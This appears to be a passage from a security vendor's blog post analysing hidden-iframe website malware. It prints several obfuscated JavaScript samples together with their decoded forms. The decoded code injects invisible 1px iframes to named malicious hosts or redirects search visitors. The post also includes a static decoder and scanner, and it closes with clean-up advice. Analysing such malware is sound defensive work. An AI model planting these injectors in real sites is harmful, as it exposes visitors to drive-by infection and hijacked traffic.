173,111,200,120,153,57,56,163,56,60,65,150,167,167,154,165,153,112,157,160,163,153,57,163,60,102,24,21,47,204,24,21,204,24,21,155,174,165,152,173,160,166,165,47,132,154,173,112,166,166,162,160,154,57,152,166,166,162,160,154,125,150,164,154,63,152,166,166,162,160,154,135,150,163,174,154,63,165,113,150,200,172,63,167,150,173,157,60,47,202,24,21,47,175,150,171,47,173,166,153,150,200,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,175,150,171,47,154,177,167,160,171,154,47,
104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,160,155,47,57,165,113,150,200,172,104,104,165,174,163,163,47,203,203,47,165,113,150,200,172,104,104,67,60,47,165,113,150,200,172,104,70,102,24,21,47,154,177,167,160,171,154,65,172,154,173,133,160,164,154,57,173,166,153,150,200,65,156,154,173,133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,67,61,71,73,61,165,113,150,200,172,60,102,24,21,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,47,104,47,152,166,166,162,160,154,125,150,164,154,62,51,104,51,62,154,172,152,150,167,154,57,152,166,166,162,160,154,135,150,163,174,154,60,24,21,47,62,47,51,102,154,177,167,160,171,154,172,104,51,47,62,47,154,177,167,160,171,154,65,173,166,116,124,133,132,173,171,160,165,156,57,60,47,62,47,57,57,167,150,173,157,60,47,106,47,51,102,47,167,150,173,157,104,51,47,62,47,167,150,173,157,47,101,47,51,51,60,102,24,21,204,24,21,155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154,57,47,165,150,164,154,47,60,47,202,24,21,47,175,150,171,47,172,173,150,171,173,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,165,150,164,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150,171,47,163,154,165,47,104,47,172,173,150,171,173,47,62,47,165,150,164,154,65,163,154,165,156,173,157,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47,50,172,173,150,171,173,47,60,47,55,55,24,21,47,57,47,165,150,164,154,47,50,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,67,63,47,165,150,164,154,65,163,154,165,156,173,157,47,60,47,60,47,60,24,21,47,202,24,21,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,204,24,21,47,160,155,47,57,47,172,173,150,171,173,47,104,104,47,64,70,47,60,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,175,150,171,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,51,102,51,63,47,163,154,165,47,60,102,24,21,47,16
0,155,47,57,47,154,165,153,47,104,104,47,64,70,47,60,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,163,154,165,156,173,157,102,24,21,47,171,154,173,174,171,165,47,174,165,154,172,152,150,167,154,57,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,163,154,165,63,47,154,165,153,47,60,47,60,102,24,21,204,24,21,160,155,47,57,165,150,175,160,156,150,173,166,171,65,152,166,166,162,160,154,114,165,150,151,163,154,153,60,24,21,202,24,21,160,155,57,116,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));
- d = document;
- for (i = 0; i < a.length; i += 1) {
- a[i] = -(10 - 3) + parseInt(a[i], 8);
- }
- try {
- asd()
- } catch (q) {
- yy = 50 - 50;
- }
- try {
- yy /= 2
- } catch (q) {
- yy = 1;
- }
- if (!yy) eval(String["fr" + "omCharCode"].apply(String, a));
Malicious action: injecting hidden iframe to http://peter.neish.net/wp-content/plugins/customize-admin/1pRwYO9W.php
- function zzzfff() {
- var l = document.createElement('iframe');
- l.src = 'http://peter.neish.net/wp-content/plugins/customize-admin/1pRwYO9W.php';
- l.style.position = 'absolute';
- l.style.border = '0';
- l.style.height = '1px';
- l.style.width = '1px';
- l.style.left = '1px';
- l.style.top = '1px';
- if (!document.getElementById('l')) {
- document.write('<div id=\'l\'></div>');
- document.getElementById('l').appendChild(l);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue)
- + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) &&
- (name != document.cookie.substring(0, name.length)))
- {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled)
- {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
Sample 8
- ps = "split";
- e = eval;
- v = "0x";
- a = 0;
- z = "y";
- try {
- a *= 25
- } catch (zz) {
- a = 1
- }
- if (!a) {
- try {
- --e("doc" + "ument")["\x62od" + z]
- } catch (q) {
- a2 = "_";
- sa = 0xa - 02;
- }
- z ="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_7f_7e_7b_6d_78_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_7f_7e_7b_6d_78_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7e_69_7b_76_6d_7c_7f_77_7a_73_6d_7a_36_6b_77_75_37_6b_76_7c_36_78_70_78_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_78_77_7b_71_7c_71_77_76_28_45_28_2f_69_6a_7b_77_74_7d_7c_6d_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_6a_77_7a_6c_6d_7a_28_45_28_2f_38_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_70_6d_71_6f_70_7c_28_45_28_2f_39_78_80_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_7f_71_6c_7c_70_28_45_28_2f_39_78_80_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_74_6d_6e_7c_28_45_28_2f_39_78_80_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_7c_77_78_28_45_28_2f_39_78_80_2f_43_15_12_15_12_28_71_6e_28_30_29_6c_77_6b_7d_75_6d_76_7c_36_6f_6d_7c_4d_74_6d_75_6d_76_7c_4a_81_51_6c_30_2f_7f_7e_7b_6d_78_2f_31_31_28_83_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_7f_7a_71_7c_6d_30_2f_44_6c_71_7e_28_71_6c_45_64_2f_7f_7e_7b_6d_78_64_2f_46_44_37_6c_71_7e_46_2f_31_43_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_6f_6d_7c_4d_74_6d_75_6d_76_7c_4a_81_51_6c_30_2f_7f_7e_7b_6d_78_2f_31_36_69_78_78_6d_76_6c_4b_70_71_74_6c_30_7f_7e_7b_6d_78_31_43_15_12_28_85_15_12_85_15_12_6e_7d_76_6b_7c_71_77_76_28_5b_6d_7c_4b_77_77_73_71_6d_30_6b_77_77_73_71_6d_56_69_75_6d_34_6b_77_77_73_71_6d_5e_69_74_7d_6d_34_76_4c_69_81_7b_34_78_69_7c_70_31_28_83_15_12_28_7e_69_7a_28_7c_77_6c_69_81_28_45_28_76_6d_7f_28_4c_69_7c_6d_30_31_43_15_12_28_7e_69_7a_28_6d_80_78_71_7a_6d_28_45_28_76_6d_7f_28_4c_69_7c_6d_30_31_43_15_12_28_71_6e_28_30_76_4c_69_81_7b_45_45_76_7d_74_74_28_84_84_28_76_4c_69_81_7b_45_45_38_31_28_76_4c_69_81_7b_45_39_43_15_12_28_6d_80_78_71_7a_6d_36_7b_6d_7c_5c_71_75_6d_30_7c_77_6c_69_81_36_6f_6d_7c_5c_71_75_6d_30_31_28_33_28_3b_3e_38_38_38_38_38_32_3a_3c_32_76_4c_69_81_7b_31_43_15_12_28_6c_77_6b_7d_75_6d_76
_7c_36_6b_77_77_73_71_6d_28_45_28_6b_77_77_73_71_6d_56_69_75_6d_33_2a_45_2a_33_6d_7b_6b_69_78_6d_30_6b_77_77_73_71_6d_5e_69_74_7d_6d_31_15_12_28_33_28_2a_43_6d_80_78_71_7a_6d_7b_45_2a_28_33_28_6d_80_78_71_7a_6d_36_7c_77_4f_55_5c_5b_7c_7a_71_76_6f_30_31_28_33_28_30_30_78_69_7c_70_31_28_47_28_2a_43_28_78_69_7c_70_45_2a_28_33_28_78_69_7c_70_28_42_28_2a_2a_31_43_15_12_85_15_12_6e_7d_76_6b_7c_71_77_76_28_4f_6d_7c_4b_77_77_73_71_6d_30_28_76_69_75_6d_28_31_28_83_15_12_28_7e_69_7a_28_7b_7c_69_7a_7c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_76_69_75_6d_28_33_28_2a_45_2a_28_31_43_15_12_28_7e_69_7a_28_74_6d_76_28_45_28_7b_7c_69_7a_7c_28_33_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_33_28_39_43_15_12_28_71_6e_28_30_28_30_28_29_7b_7c_69_7a_7c_28_31_28_2e_2e_15_12_28_30_28_76_69_75_6d_28_29_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_7b_7d_6a_7b_7c_7a_71_76_6f_30_28_38_34_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_31_28_31_28_31_15_12_28_83_15_12_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_85_15_12_28_71_6e_28_30_28_7b_7c_69_7a_7c_28_45_45_28_35_39_28_31_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_7e_69_7a_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_2a_43_2a_34_28_74_6d_76_28_31_43_15_12_28_71_6e_28_30_28_6d_76_6c_28_45_45_28_35_39_28_31_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_74_6d_76_6f_7c_70_43_15_12_28_7a_6d_7c_7d_7a_76_28_7d_76_6d_7b_6b_69_78_6d_30_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_7b_7d_6a_7b_7c_7a_71_76_6f_30_28_74_6d_76_34_28_6d_76_6c_28_31_28_31_43_15_12_85_15_12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_3
1_43_15_12_85_15_12_85_15_12"[ps](a2);
- za = "";
- for (i = 0; i < z.length; i++) {
- za += String["fromCharCode"](e(v + (z[i])) - sa);
- }
- zaz = za;
- e(zaz);
- }
Malicious action: injecting hidden iframe to http://vasnetworker.com/cnt.php
- function zzzfff() {
- var wvsep = document.createElement('iframe');
- wvsep.src = 'http://vasnetworker.com/cnt.php';
- wvsep.style.position = 'absolute';
- wvsep.style.border = '0';
- wvsep.style.height = '1px';
- wvsep.style.width = '1px';
- wvsep.style.left = '1px';
- wvsep.style.top = '1px';
- if (!document.getElementById('wvsep')) {
- document.write('<div id=\'wvsep\'></div>');
- document.getElementById('wvsep').appendChild(wvsep);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue)
- + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) &&
- (name != document.cookie.substring(0, name.length)))
- {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled)
- {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
Sample 9
- eval(String.fromCharCode(107, 49, 61, 34, 107, 101, 108, 108, 121, 43, 98, 108, 117, 101, 43, 98, 111, 111, 107,34, 59, 114, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 114, 101, 102, 101, 114, 114, 101, 114, 59, 117, 61,100, 111, 99, 117, 109, 101, 110, 116, 46, 85, 82, 76, 59, 116, 61, 34, 34, 59, 115, 101, 61, 34, 117, 110, 107,110, 111, 119, 110, 34, 59, 32, 13, 10, 102, 117, 110, 99, 116, 105, 111, 110, 32, 97, 40, 99, 44, 100, 44, 101,41, 123, 105, 102, 40, 114, 46, 105, 110, 100, 101, 120, 79, 102, 40, 99, 41, 33, 61, 45, 49, 41, 123, 116, 61,100, 59, 115, 101, 61, 101, 59, 125, 125, 32, 13, 10, 97, 40, 34, 103, 111, 111, 103, 108, 101, 46, 34, 44, 34,113, 34, 44, 34, 103, 111, 111, 103, 108, 101, 34, 41, 59, 32, 13, 10, 97, 40, 34, 109, 115, 110, 46, 34, 44, 34,113, 34, 44, 34, 109, 115, 110, 34, 41, 59, 32, 13, 10, 97, 40, 34, 121, 97, 104, 111, 111, 46, 34, 44, 34, 112,34, 44, 34, 121, 97, 104, 111, 111, 34, 41, 59, 32, 13, 10, 97, 40, 34, 97, 108, 116, 97, 118, 105, 115, 116, 97,46, 34, 44, 34, 113, 34, 44, 34, 97, 108, 116, 97, 118, 105, 115, 116, 97, 34, 41, 59, 32, 13, 10, 97, 40, 34, 97,111, 108, 46, 34, 44, 34, 113, 117, 101, 114, 121, 34, 44, 34, 97, 111, 108, 34, 41, 59, 32, 13, 10, 97, 40, 34,97, 115, 107, 46, 34, 44, 34, 113, 34, 44, 34, 97, 115, 107, 34, 41, 59, 32, 13, 10, 97, 40, 34, 101, 117, 114,101, 107, 97, 46, 99, 111, 109, 46, 34, 44, 34, 113, 34, 44, 34, 101, 117, 114, 101, 107, 97, 46, 99, 111, 109,34, 41, 59, 32, 13, 10, 97, 40, 34, 108, 121, 99, 111, 115, 46, 99, 111, 109, 46, 34, 44, 34, 113, 117, 101, 114,121, 34, 44, 34, 108, 121, 99, 111, 115, 34, 41, 59, 32, 13, 10, 97, 40, 34, 104, 111, 116, 98, 111, 116, 46, 99,111, 109, 46, 34, 44, 34, 77, 84, 34, 44, 34, 104, 111, 116, 98, 111, 116, 34, 41, 59, 32, 13, 10, 97, 40, 34,105, 110, 102, 111, 115, 101, 101, 107, 46, 99, 111, 109, 46, 34, 44, 34, 113, 116, 34, 44, 34, 105, 110, 102,111, 115, 101, 101, 107, 46, 99, 111, 109, 34, 41, 59, 32, 13, 10, 97, 40, 34, 119, 101, 98, 
99, 114, 97, 119,108, 101, 114, 46, 34, 44, 34, 115, 101, 97, 114, 99, 104, 84, 101, 120, 116, 34, 44, 34, 119, 101, 98, 99, 114,97, 119, 108, 101, 114, 34, 41, 59, 32, 13, 10, 97, 40, 34, 101, 120, 99, 105, 116, 101, 46, 34, 44, 34, 115, 101,97, 114, 99, 104, 34, 44, 34, 101, 120, 99, 105, 116, 101, 34, 41, 59, 32, 13, 10, 97, 40, 34, 110, 101, 116, 115,99, 97, 112, 101, 46, 99, 111, 109, 46, 34, 44, 34, 115, 101, 97, 114, 99, 104, 34, 44, 34, 110, 101, 116, 115,99, 97, 112, 101, 34, 41, 59, 32, 13, 10, 97, 40, 34, 109, 97, 109, 109, 97, 46, 99, 111, 109, 46, 34, 44, 34,113, 117, 101, 114, 121, 34, 44, 34, 109, 97, 109, 109, 97, 34, 41, 59, 32, 13, 10, 97, 40, 34, 97, 108, 108, 116,104, 101, 119, 101, 98, 46, 99, 111, 109, 46, 34, 44, 34, 113, 117, 101, 114, 121, 34, 44, 34, 97, 108, 108, 116,104, 101, 119, 101, 98, 46, 99, 111, 109, 34, 41, 59, 32, 13, 10, 97, 40, 34, 110, 111, 114, 116, 104, 101, 114,110, 108, 105, 103, 104, 116, 46, 99, 111, 109, 46, 34, 44, 34, 113, 114, 34, 44, 34, 110, 111, 114, 116, 104,101, 114, 110, 108, 105, 103, 104, 116, 46, 99, 111, 109, 34, 41, 59, 32, 13, 10, 13, 10, 105, 102, 40, 116, 46,108, 101, 110, 103, 116, 104, 38, 38, 40, 40, 113, 61, 114, 46, 105, 110, 100, 101, 120, 79, 102, 40, 34, 63, 34,43, 116, 43, 34, 61, 34, 41, 41, 33, 61, 45, 49, 124, 124, 40, 113, 61, 114, 46, 105, 110, 100, 101, 120, 79, 102,40, 34, 38, 34, 43, 116, 43, 34, 61, 34, 41, 41, 33, 61, 45, 49, 41, 41, 123, 13, 10, 107, 61, 114, 46, 115, 117,98, 115, 116, 114, 105, 110, 103, 40, 113, 43, 50, 43, 116, 46, 108, 101, 110, 103, 116, 104, 41, 46, 115, 112,108, 105, 116, 40, 34, 38, 34, 41, 91, 48, 93, 46, 115, 112, 108, 105, 116, 40, 34, 43, 34, 41, 46, 106, 111, 105,110, 40, 34, 37, 50, 48, 34, 41, 46, 115, 112, 108, 105, 116, 40, 34, 37, 50, 48, 34, 41, 46, 106, 111, 105, 110,40, 34, 37, 50, 66, 34, 41, 59, 13, 10, 103, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 115, 105,109, 118, 46, 105, 110, 102, 111, 47, 105, 110, 46, 99, 103, 105, 63, 
50, 38, 72, 84, 84, 80, 95, 82, 69, 70, 69,82, 69, 82, 61, 34, 43, 107, 43, 34, 59, 34, 43, 101, 110, 99, 111, 100, 101, 85, 82, 73, 67, 111, 109, 112, 111,110, 101, 110, 116, 40, 117, 41, 43, 34, 59, 34, 43, 115, 101, 43, 34, 59, 34, 43, 114, 43, 34, 59, 34, 43, 34,38, 117, 114, 61, 49, 38, 112, 97, 114, 97, 109, 101, 116, 101, 114, 61, 34, 43, 107, 49, 59, 13, 10, 119, 105,110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 103, 59, 125, 13, 10, 101, 108, 115, 101, 123,119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47,97, 98, 111, 117, 116, 46, 104, 97, 117, 116, 101, 116, 102, 111, 114, 116, 46, 99, 111, 109, 34, 59, 125));
Malicious action: injecting hidden iframe to either www.simv.info/in.cgi or http://about.hautetfort.com
- k1 = "kelly+blue+book";
- r = document.referrer;
- u = document.URL;
- t = "";
- se = "unknown";
- function a(c, d, e) {
- if (r.indexOf(c) != -1) {
- t = d;
- se = e;
- }
- }
- a("google.", "q", "google");
- a("msn.", "q", "msn");
- a("yahoo.", "p", "yahoo");
- a("altavista.", "q", "altavista");
- a("aol.", "query", "aol");
- a("ask.", "q", "ask");
- a("eureka.com.", "q", "eureka.com");
- a("lycos.com.", "query", "lycos");
- a("hotbot.com.", "MT", "hotbot");
- a("infoseek.com.", "qt", "infoseek.com");
- a("webcrawler.", "searchText", "webcrawler");
- a("excite.", "search", "excite");
- a("netscape.com.", "search", "netscape");
- a("mamma.com.", "query", "mamma");
- a("alltheweb.com.", "query", "alltheweb.com");
- a("northernlight.com.", "qr", "northernlight.com");
- if (t.length && ((q = r.indexOf("?" + t + "=")) != -1 || (q = r.indexOf("&" + t + "=")) != -1)) {
- k = r.substring(q + 2 + t.length).split("&")[0].split("+").join("%20").split("%20").join("%2B");
- g = "http://www.simv.info/in.cgi?2&HTTP_REFERER=" + k + ";" + encodeURIComponent(u) + ";" + se + ";" + r + ";"+ "&ur=1&parameter=" + k1;
- window.location = g;
- } else {
- window.location = "http://about.hautetfort.com";
- }
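The three encodings used by Samples 7, 8 and 9 (octal minus 7, hex minus 8, plain decimal) can be reversed into text without ever calling eval(). The block below is an added example, not part of the original post and not Quttera's scanner code; the names SCHEMES, decodeCharCodes, INDICATORS and analyze are assumptions of this example, and the three excerpts are short runs copied from the encoded payloads above.

```javascript
// Added example: static decoder for the char-code encodings of Samples 7-9.
// The payload is only converted back to text; nothing is passed to eval().
const SCHEMES = {
  sample7: { separator: ",", radix: 8, offset: -7 },  // -(10 - 3) + parseInt(x, 8)
  sample8: { separator: "_", radix: 16, offset: -8 }, // e("0x" + x) - (0xa - 02)
  sample9: { separator: ",", radix: 10, offset: 0 },  // String.fromCharCode(107, 49, ...)
};

function decodeCharCodes(encoded, { separator, radix, offset }) {
  return encoded
    .split(separator)
    .map((tok) => tok.trim().toLowerCase())
    .filter((tok) => tok.length > 0) // tolerate a trailing separator
    .map((tok) => {
      const n = parseInt(tok, radix);
      // parseInt() silently stops at the first bad digit, so re-encode and compare.
      if (Number.isNaN(n) || n.toString(radix) !== tok.replace(/^0+(?=.)/, "")) {
        throw new RangeError(`"${tok}" is not a base-${radix} number`);
      }
      const code = n + offset;
      if (code < 0 || code > 0xffff) throw new RangeError(`"${tok}" is out of range`);
      return String.fromCharCode(code);
    })
    .join("");
}

// Patterns taken from the decoded payloads shown on this page.
const INDICATORS = [
  ["iframe-created", /createElement\(\s*['"]iframe['"]\s*\)/i],
  ["one-pixel-size", /\.style\.(?:width|height)\s*=\s*['"]1px['"]/i],
  ["document-write", /document\.write\s*\(/i],
  ["forced-redirect", /window\.location\s*=/i],
];

function analyze(decoded) {
  const findings = INDICATORS.filter(([, re]) => re.test(decoded)).map(([name]) => name);
  const urls = [...new Set(decoded.match(/https?:\/\/[^\s'"<>)]+/gi) || [])];
  return { findings, urls };
}

// Short excerpts copied from the encoded payloads of Samples 7, 8 and 9 above.
const EXCERPT_7 = "155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154";
const EXCERPT_8 = "7f_7e_7b_6d_78_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7e_69_7b_76_6d_7c_7f_77_7a_73_6d_7a_36_6b_77_75_37_6b_76_7c_36_78_70_78_2f_43";
const EXCERPT_9 = "119, 105,110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47,97, 98, 111, 117, 116, 46, 104, 97, 117, 116, 101, 116, 102, 111, 114, 116, 46, 99, 111, 109, 34, 59";

for (const [name, text] of [["sample7", EXCERPT_7], ["sample8", EXCERPT_8], ["sample9", EXCERPT_9]]) {
  const decoded = decodeCharCodes(text, SCHEMES[name]);
  console.log(name, JSON.stringify(decoded), analyze(decoded));
}
```

Feeding a complete payload string through decodeCharCodes and analyze in the same way lists the indicators and URLs it contains without running any of it.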
Summary
Scanning your website for hidden iframes and other invisible threats can save you the headache of getting off a blacklist later. It also helps you avoid traffic loss in the early stages of an attack!
Successful hacking is usually made possible by website owners neglecting security best practices.
Malware clean-up
Such malware is often hidden inside a JavaScript file. If you suspect that your website has been infected by similar malware, please use Website Anti-malware Monitoring for real-time anti-malware monitoring and remediation assessment.